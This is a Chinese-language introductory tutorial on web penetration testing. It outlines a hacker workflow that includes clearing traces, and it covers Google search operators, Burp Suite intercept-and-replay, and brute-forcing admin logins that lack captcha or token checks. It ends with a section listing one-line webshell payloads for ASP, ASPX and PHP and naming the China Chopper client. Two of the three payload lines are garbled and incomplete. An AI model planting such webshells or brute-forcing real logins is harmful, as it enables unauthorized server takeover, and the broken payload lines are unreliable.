渗透测试的概念和实战

精选30+云产品，助力企业轻松上云！>>>

• 目录
• 1. 前言
• 2. 常见web安全漏洞
• 3. 思路
• 3.1渗透测试思路
• 3.2黑客攻击思路
• 4. 暴力破解
• 4.1谷歌黑语法
• 4.1.1 黑语法inurl：搜索url包含指定字符串
• 4.1.2 黑语法intitle：搜索网页中的标题名是否包含指定字符串
• 4.1.3 黑语法intext：搜索网页正文内容是否包含指定字符串
• 4.2Burpsuite常用功能
• 4.2.1 拦截
• 4.2.2抓包
• 4.2.3改包
• 4.2.4重放
• 4.3后台暴力破解
• 5. 上传木马或漏洞
• 5.1一句话木马
• 5.2上传漏洞

1.前言

渗透测试时通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法。

2.常见web安全漏洞

3.思路

3.1渗透测试思路

信息收集->攻击测试

3.2黑客攻击思路

信息收集->攻击测试->提升权限->扩大成果->清除痕迹

4.暴力破解

4.1谷歌黑语法

4.1.1黑语法inurl：搜索url包含指定字符串

4.1.2黑语法intitle：搜索网页中的标题名是否包含指定字符串

4.1.3黑语法intext：搜索网页正文内容是否包含指定字符串

4.2Burpsuite常用功能

Burpsuite是Java开发的工具，所以需要安装好JDK，版本最好1.8以上

使用流程：

拦截->抓包->改包->重放

4.2.1 拦截

点击options配置代理服务器

浏览器也要配置，这里使用火狐浏览器，安装插件proxy或者谷歌hackbar

4.2.2抓包

配置好，刷新浏览器就能截取到数据包

但此时并没有达到拦截效果，需要开启Intercept，改为ON

4.2.3改包

刷新浏览器就能截取到数据包,并拦截

4.2.4重放

重放数据包

4.3后台暴力破解

对登陆数据包不存在的验证码、token等一次性验证进行破解。

5.上传木马或漏洞

5.1一句话木马

• asp：<%eval request(“pass”)%>
• aspx：<%@Page Language%>“pass”].” unsafe”);%>
• php：‘pass’];);?>

5.2上传漏洞

软件：中国菜刀，配合木马使用